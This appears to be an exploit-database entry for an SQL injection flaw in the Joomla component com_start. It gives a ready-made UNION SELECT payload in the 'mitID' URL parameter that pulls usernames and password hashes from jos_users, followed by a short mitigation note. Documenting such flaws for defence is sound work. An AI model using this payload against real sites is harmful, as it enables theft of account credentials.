vendor:
N/A
by:
DevilZ TM By D3v1l
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A
Joomla Component com_start SQL Injection Vulnerability
An SQL injection vulnerability exists in the Joomla Component com_start. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'mitID' in the URL. An example of this exploit is http://127.0.0.1/index.php?option=com_start&task=main&mitID=-1/**/UNION/**/SELECT/**/1,concat(username,0x3a,password),3,4/**/FROM/**/jos_users/*
Mitigation:
Input validation should be used to prevent SQL injection attacks. Sanitize user input and use parameterized queries.